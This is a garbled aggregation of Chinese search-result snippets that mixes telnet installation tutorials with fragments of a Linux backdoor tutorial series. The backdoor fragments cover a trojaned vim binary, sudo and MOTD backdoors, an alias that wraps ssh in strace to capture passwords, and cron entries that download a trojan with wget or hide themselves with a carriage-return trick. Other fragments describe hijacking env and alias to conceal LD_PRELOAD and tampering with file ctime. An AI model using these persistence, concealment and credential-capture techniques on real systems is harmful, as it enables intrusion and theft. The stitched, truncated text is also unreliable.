环境变量的方式进行配置 果然,$VIMRUNTIME 是从 Linux 操作系统的环境变量来的 因此永久修改 VIMRUNTIME 不一定会修改 runtimepath ,只有通过Linux...:help autocmd-events 0x03 vim 后门说明 vim 软件成熟度比较高,功能较为复杂,因此可以用来做后门的内容肯定很多,作为一个 vim 用户,我对于 vim 的了解也比较有限...,相信在以后还会对现在写的后门手法进行补充 0x04 vim 自身文件后门 这类后门比较简单粗暴,直接替换相关文件,暂时未发现 vim 存在自身使用的 .so 共享库文件,因此本章节以直接替换命令本身为例...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法
telnet命令通常用来远程登录。telnet程序是基于TELNET协议的远程登录客户端程序。Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。...要开始一个 telnet会话,必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。...但是,telnet因为采用明文传送报文,安全性不好,很多Linux服务器都不开放telnet服务,而改用更安全的ssh方式了。...但仍然有很多别的系统可能采用了telnet方式来提供远程登录,因此弄清楚telnet客户端的使用方式仍是很有必要的。...localhost (Linux release 2.6.18-274.18.1.el5 #1 SMP Thu Feb 9 12:45:44 EST 2012) (1)login: rootPassword
一、安装telnet step 1 rpm -qa telnet-server 无输出表示telnet-server未安装,则执行step2,否则执行step3 step 2 yum -y install...telnet-server 安装telnet-server step 3 rpm -qa telnet 无输出表示telnet未安装,则执行step4,否则执行step5 [root@amdyes...~]# rpm -qa telnet telnet-0.17-65.el7_8.x86_64 step 4 yum -y install telnet 安装 二、重新启动xinetd守护进程...= /usr/sbin/in.telnetd log_on_failure += USERID } 默认disable是yes,修改为no即可 以上就是Linux...源 本文链接:https://www.findmyfun.cn/linux-telnet-installation.html 转载时须注明出处及本声明。
今天说一说Linux安装telnet,希望能够帮助大家进步!!!...一、安装telnet 1、检测telnet-server的rpm包是否安装 [root@localhost ~]# rpm -qa telnet-server 若无输入内容,则表示没有安装。...出于安全考虑telnet-server.rpm是默认没有安装的,而telnet的客户端是标配。即下面的软件是默认安装的。...2、若未安装,则安装telnet-server,否则忽略此步骤 [root@localhost ~]#yum install telnet-server 3、检测telnet-server...的rpm包是否安装 [root@localhost ~]# rpm -qa telnet telnet-0.17-47.el6_3.1.x86_64 4、若未安装,则安装telnet,否则忽略此步骤
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...22.10 为例 0x01 sudo 配置后门 1) 简介 通常的应用场景中,配置 sudo 主要是用来赋予某个用户或者用户组能够以 root(或其他用户) 的身份(以及权限)执行部分(或全部) 程序...空白文件名 文件 + alias 劫持的方法来隐藏新建文件 有时候也没必要新建用户,可以尝试开启那些系统用户试试,或许有惊喜也说不定,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门...这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到 sudoedit (sudo -e) 这个程序,这个程序用来让可以sudo的用户通过 sudoedit
/etc/profile 、 /etc/bashrc 、~/.bashrc、~/.bash_profile 、~/.profile 、~/.bash_logout /etc/profile 【系统级】Linux...%h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章,发现的同一条后门命令,既然有前辈写了,咱们就分析分析 上面后门中,其实 alias...把strace的输出单独写到指定的文件 /tmp/sshpwd-xxx.log ,这个没啥好说的 -e read,write,connect Linux内核目前有300多个系统调用,详细的列表可以通过...,记录明文密码,这局限性太大了,顶多可以作为一个后门辅助。...后门 ?
Ubuntu server 16.04 默认 /etc/ssh/ssh_config
telnet命令通常用来远程登录,默认端口是23。telnet程序是基于TELNET协议的远程登录客户端程序。...要开始一个 telnet会话,必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。...telnet因为采用明文传送报文,安全性不好,很多Linux服务器都不开放telnet服务,而改用更安全的ssh方式了。...服务器无法访问可以先用telnet > telnet json.im telnet json.im Trying 150.109.147.28... telnet: connect to address...测试端口情况 > telnet json.im 80 注意:json.im所在的服务器一定要安装telnet服务,并且开放23端口 原文链接:https://rumenz.com/rumenbiji/linux-telnet.html
telnet命令通常用来远程登录,默认端口是23。telnet程序是基于TELNET协议的远程登录客户端程序。...要开始一个 telnet会话,必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。...telnet因为采用明文传送报文,安全性不好,很多Linux服务器都不开放telnet服务,而改用更安全的ssh方式了。...服务器无法访问可以先用telnet > telnet json.im telnet json.im Trying 150.109.147.28... telnet: connect to address...linux-telnet.html
telnet命令通常用来远程登录,默认端口是23。telnet程序是基于TELNET协议的远程登录客户端程序。...要开始一个 telnet会话,必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。...telnet因为采用明文传送报文,安全性不好,很多Linux服务器都不开放telnet服务,而改用更安全的ssh方式了。...服务器无法访问可以先用telnet > telnet json.im telnet json.im Trying 150.109.147.28... telnet: connect to address.../linux-telnet.html 微信公众号:入门小站 发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/155042.html原文链接:https://javaforall.cn
Linux 计划任务是一项服务,由 cron 工具来完成,主要目的就是在无需人工干预的情况下运行作业 PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了 0x01 cron服务简介...一会儿再说吧(Linux上万物皆文件,肯定是文件啦!)...3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab...这种利用方法巧妙在使用了windows中的 \r( Linux 中显示为M),导致显示截断,从而隐藏我们真实的计划任务,我们使用crontab -e 可以看到真实的计划任务如下: ?
加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...设置后门后是这样的 ? alias 劫持显示 这个简单了,把这些字符替换成空就行了 ?...咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下: env 没有后门时候是这样的 ? 设置了后门之后是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!
0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...所以可以查看 stat 的源代码,看一下 stat 应用是如何获取和管理 ctime 的,针对其调用的方法进行系统性地修改应该也是可以实现修改文件 ctime 的 0x03 系统时钟与硬件时钟 Linux...时间系统分为系统时钟和硬件时钟,系统时钟存在于Linux 内核中,而硬件时钟存在于硬件主板上 从两种时钟的命名上可以看出,硬件时钟肯定是要比系统时钟更加持久,毕竟系统时钟系统关机就没了嘛 硬件时钟靠着.../etc/update-manager/ 如果是需要执行的后门,现在执行并放置后台,如果像 alias 那种配置文件后门则不需要此章节 /etc/update-manager/release-update
最近看了苑房弘老师的打靶课程,发现了 MOTD 这个东西,于是研究了一下,发现很适合做后门,早在08年以前就有恶意软件使用了这种方式,今天系统地研究一下 motd,全称Message Of The Day...,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多...root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!...- Linux 命令搜索引擎 https://wangchujiang.com/linux-command/c/trap.html # Construct a user agent, similar to...是如何使策略配置生效的 参考 Linux Source Command with Examples https://linuxhint.com/linux-source-command-examples
语法 telnet [-a][-e escape char][-f log file][-l user][-t term][host [port]] 参数 -a 企图自动登录。...-e 跳过字符来进入 telnet 客户提示。 -f 客户端登录的文件名 -l 指定远程系统上登录用的用户名称。 要求远程系统支持 TELNET ENVIRON 选项。...telnet登录 telnet HOST [port] 例如: telnet 10.100.10.11 telnet 10.100.10.101 8080 退出登录命令 当通过telnet登录成功之后
1.简介 telnet命令用于登录远程主机,是基于Telnet协议的远程登录程序,对远程主机进行管理。...telnet因为采用明文传送报文,安全性不好,很多Linux服务器都不开放telnet服务,而改用更安全的ssh方式了。...但仍然有很多别的系统可能采用了telnet方式来提供远程登录,因此弄清楚telnet客户端的使用方式仍是很有必要的。 telnet命令还可做别的用途,比如确定远程服务器的某个端口是否能访问。...ip:中断进程命令 synch:执行Telnet同步操作。 quit:退出 Telnet 客户端。...status:显示当前Telnet连接状态 ---- 参考文献 [1]telnet manual [2]Linux命令大全.telnet命令 [3]每天一个Linux命令(52)telnet命令
检查系统是否安装telnet,如果没有安装去网上下载或linux安装盘中安装 #rpm –qa |grep telnet telnet-server-0.17-31.EL4.5 telnet-0.17...-31.EL4.5 安装完后,即可启动telnet服务 方法一:使用ntsysv,在出现的窗口之中,将 telnet前面*加上,然后按下 OK 。...方法二:# vi /etc/xinetd.d/telnet 找到 disable = yes 将 yes 改成 no telnet服务限制 #vi /etc/xinetd.d/telnet service...telnet { disable = no #激活telnet服务 bind = 210.45.160.17 #your ip only_from = 210.45.0.0/16 #只允许 210.45.0.0...不是很安全,默认的情况之下不允许 root 以 telnet 进入 Linux 主机 。
1、Linux安装telnet包 # yum install telnet* # rpm -qa |grep telnet telnet-server-0.17...-47.el6_3.1.x86_64 telnet-0.17-47.el6_3.1.x86_64 2、修改telnet服务配置文件 # vi /etc/xinetd.d.../telnet # default: on # description: The telnet server serves telnet sessions; it uses \...服务后,系统才会有/usr/sbin/in.telnetd文件 3、telnet服务启动 因为 telnet服务是由xinetd 调用,所以只要重新启动 xinetd即可...此时,再重启telnet,便可以以root用户登录telnet服务器了。 就可以使用ROOT用户以telnet方式登录Linux系统了。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
